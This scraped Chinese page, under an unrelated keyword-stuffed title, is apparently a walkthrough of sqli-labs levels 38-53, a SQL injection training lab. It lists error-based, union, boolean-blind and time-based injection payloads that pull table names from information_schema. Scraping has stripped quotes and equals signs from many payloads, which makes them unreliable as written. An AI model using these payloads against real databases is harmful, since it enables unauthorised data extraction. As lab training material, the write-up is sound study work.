当前位置：首页 > news >正文

济阳县建设局网站wordpress做淘宝旺旺

news 2025/11/18 0:17:48

济阳县建设局网站,wordpress做淘宝旺旺,公司网站怎么自己制作,孝感网页设计sqli-labs-master 38-53 Stacked-Injections 其他关卡和靶场看专栏… 文章目录 sqli-labs-master 38-53 Stacked-Injections第三十八关-报错注入第三十九关-报错注入第四十关-盲注第四十一关-盲注第四十二关-联合报错双查询注入第四十三关-报错注入第四十四关-盲注第四十五关-…sqli-labs-master 38-53 Stacked-Injections 其他关卡和靶场看专栏… 文章目录 sqli-labs-master 38-53 Stacked-Injections第三十八关-报错注入第三十九关-报错注入第四十关-盲注第四十一关-盲注第四十二关-联合报错双查询注入第四十三关-报错注入第四十四关-盲注第四十五关-盲注第四十六关-报错注入第四十七关-报错注入第四十八关-时间盲注第四十九关-时间盲注第五十关-报错注入第五十一关-报错注入第五十二关-时间盲注第五十三关-时间盲注总结第三十八关-报错注入 ?id1 ?id1 and 11通过上述语句可以判断这是单引号闭合根据报错信息可以试一下报错注入 ?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3) -- #第三十九关-报错注入 ?id2-1通过上述语句回显1的信息可以初步判断这是数字型注入根据报错信息可以尝试报错注入 ?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3)第四十关-盲注 ?id1 ?id1 and 11 ?id1 and 12 ?id1 and length(database())8 and 11对于第一个语句页面没有回显错误信息所以假设为单引号闭合试一下第二个和第三个发现页面仅仅有显示和不显示所以使用盲注第四十一关-盲注 ?id2-1 ?id2 and 11第一段语句回显1的信息第二段回显2的信息得知这是字符型注入没有报错信息所以试一下盲注 ?id1 and length(database())8第四十二关-联合报错双查询注入对账号密码分别进行单引号探针发现仅仅password部分有报错根据报错信息得知这是单引号闭合尝试union注入 login_user1login_password1 order by 3#mysubmitLogin login_user1login_password1 order by 4#mysubmitLoginlogin_user1login_password1 union select 1,database(),3#mysubmitLoginlogin_user1login_password1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),3#mysubmitLogin同样也可以进行双查询注入 login_user1login_password1 union select 1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x3a,floor(rand(14)*2)) as a,count(*) from information_schema.columns group by a#mysubmitLogin也可以直接updatexml报错注入 login_user1login_password1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3)#mysubmitLogin第四十三关-报错注入对账号密码进行引号探针发现仅仅password部分显示报错信息根据报错信息可以知道这是单引号加上括号闭合尝试报错注入报错内容正常回显 login_user1login_password1) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3)#mysubmitLogin第四十四关-盲注 login_user1login_password1 or 11mysubmitLogin在对账号和密码添加引号时候发现没有任何报错所以有可能print_r(mysqli_error())被注释了。尝试or发现成功登录所以判断这是单引号闭合由于没有报错信息所以尝试Union注入。输入order by判断字段数时候发现原来应有的报错信息变成了登录失败order by 3以内为成功4及以上为登录失败所以union select 1,2,3判断回显位发现没有回显位所以只能进行盲注 login_user1login_password1 or length(database())8 -- #mysubmitLogin第四十五关-盲注 login_user1login_password1 or 11mysubmitLogin login_user1login_password1 or 11mysubmitLogin通过上述语句并没有得到任何的报错信息所以猜测存在括号 $sql SELECT * FROM users WHERE username($username) and password($password);查看源代码发现确实存在括号所以构造闭合成功登录 login_user1login_password1) or (11mysubmitLogin由于没有报错信息所以使用盲注 login_user1login_password1) or length(database())8 -- #mysubmitLogin第四十六关-报错注入查看源代码发现order by关键字这个关键字的作用就是针对第几列进行升序排序 $sql SELECT * FROM users ORDER BY $id;对参数值进行探针,发现order by后面是可以添加语句的添加引号发现存在报错信息所以尝试报错注入 ?sort3 and sleep(3)?sort4 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3)第四十七关-报错注入添加引号之后回显报错信息可知这是单引号闭合并且可以尝试报错注入 ?sort1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3) -- #第四十八关-时间盲注添加单引号之后发现没有返回排序信息并且没有报错信息所以猜测报错函数被注释了故尝试盲注。使用2-1发现和1的效果是一样的所以判断是数字型注入 ?sort1 and if(length(database())8,sleep(2),1)这一道题使用不了布尔盲注因为sort的值仅仅是order by的值而不是where条件值。第四十九关-时间盲注使用单引号探针没有回显报错信息所以猜测报错函数被注释了所以尝试 ?sort1 -- #页面正常显示所以判断这是单引号闭合由于报错函数被注释所以使用盲注 ?sort1 and if(length(database())8,sleep(1),1) -- #第五十关-报错注入单引号探针显示报错信息所以判断这是数字型注入且可以尝试报错注入 ?sort1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3)第五十一关-报错注入好简单 ?sort1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase())),3) -- #第五十二关-时间盲注引号探针没有回显任何信息使用1’ and ‘1’1并没有正常显示使用2-1回显1的信息所以判断是数字型注入由于没有报错信息所以使用时间盲注 ?sort1 and if(length(database())8,sleep(1),1)第五十三关-时间盲注服了后面为什么这么简单…加上单引号没有东西显示所以我们尝试闭合并使用时间盲注 ?sort1 and sleep(3) -- #有延时所以存在时间盲注。总结后面的真的好简单没啥好总结的做了这么多题发现这一部分没啥好看的。

查看全文

http://www.pierceye.com/news/537597/